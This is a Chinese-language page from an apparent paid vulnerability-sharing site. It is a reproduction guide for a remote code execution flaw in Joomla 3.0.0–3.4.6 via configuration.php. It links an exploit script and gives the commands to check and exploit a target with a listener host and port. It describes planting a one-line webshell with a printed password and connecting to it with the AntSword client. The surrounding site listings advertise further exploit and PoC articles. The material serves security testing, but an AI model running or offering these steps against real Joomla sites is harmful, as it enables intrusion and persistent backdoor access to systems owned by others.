Joomla 3.4.6 – ‘configuration.php’ Remote Code Execution

050

Joomla 3.4.6 configuration.php 远程代码执行
===========================================

一、漏洞简介
————

Joomla 3.4.6 – \’configuration.php\’ Remote Code Execution

二、影响范围
————

Joomla 3.0.0 至 3.4.6

三、复现过程
————

https://github.com/ianxtianxt/Joomla-3.4.6\-\–configuration.php-Remote-Code-Execution

### 脚本验证

验证:

python3 test.py -t http://127.0.0.1:8080/

![img](/static/yougar/Web安全/Joomla/resource/Joomla3.4.6-‘configuration.php’RemoteCodeExecution/media/rId25.png)

显示”Vulnerable”证明存在漏洞

利用:

python3 test.py -t http://127.0.0.1:8080/ –exploit –lhost 192.168.31.126 –lport 2121

![img](/static/yougar/Web安全/Joomla/resource/Joomla3.4.6-‘configuration.php’RemoteCodeExecution/media/rId26.png)

执行成功

并在”configuration.php”写入**随机密码**的一句话木马![img](/static/yougar/Web安全/Joomla/resource/Joomla3.4.6-‘configuration.php’RemoteCodeExecution/media/rId27.png)上图的密码为:kyevgbxjmwivdvegohfzwuukuzswxqquthlrsollpxzgiifumi

蚁剑链接测试

![img](/static/yougar/Web安全/Joomla/resource/Joomla3.4.6-‘configuration.php’RemoteCodeExecution/media/rId28.png)

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞库
喜欢就支持一下吧
点赞0赞赏 分享
棉花糖的头像-棉花糖会员站糖心会员
会员必看手册(1.8.8版本 25.12.12更新)-棉花糖会员站
会员必看手册(1.8.8版本 25.12.12更新)
会员必看手册(1.8.8版本 25.12.12更新)
2025年12月1日 3.7W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 1.5W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 8549
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6239
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4555
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3717
相关推荐
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6239
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 2416
百度网盘Windows客户端存在远程命令执行-棉花糖会员站
百度网盘Windows客户端存在远程命令执行
百度网盘Windows客户端存在远程命令执行
2025年9月4日 2287
大华 evo-runs/v1.0/receive RCE-棉花糖会员站
大华 evo-runs/v1.0/receive RCE
大华 evo-runs/v1.0/receive RCE
2025年7月11日 1967
wps 远程代码执行 rce-棉花糖会员站
wps 远程代码执行 rce
wps 远程代码执行 rce
2025年7月18日 1804
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行-棉花糖会员站
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
2025年7月4日 1692
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站糖心会员
竹云iam认证系统文件读取
安友固定资产管理存在身份绕过
殡仪馆管理系统 AshesSearch.jsp 信息泄露
浙江高格软件股份有限公司高格智能制造目视化系统SCCJ参数存在SQL注入
移动应用渗透测试专家培训 2025.7 中英双语字幕
喰星云·数字化餐饮服务系统 home_check 存在SQL注入
最近一周热门文章

1恒友摄影ERP login.ashx 存在SQL注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月7日
9999714

2网络数据安全风险评估报告模版.docx

棉花糖的头像-棉花糖会员站糖心会员2025年12月7日
糖心会员会员专属703

3时尚企业管理系统log.aspx日志页面未授权访问

棉花糖的头像-棉花糖会员站糖心会员2025年12月7日
9999697

4浙江高格软件股份有限公司高格智能制造目视化系统SCCJ参数存在SQL注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月11日
9999681

5点晴MIS管理信息系统 login_out.asp 存在SQL注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月7日
9999665

6喰星云·数字化餐饮服务系统 home_check 存在SQL注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月9日
9999663
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密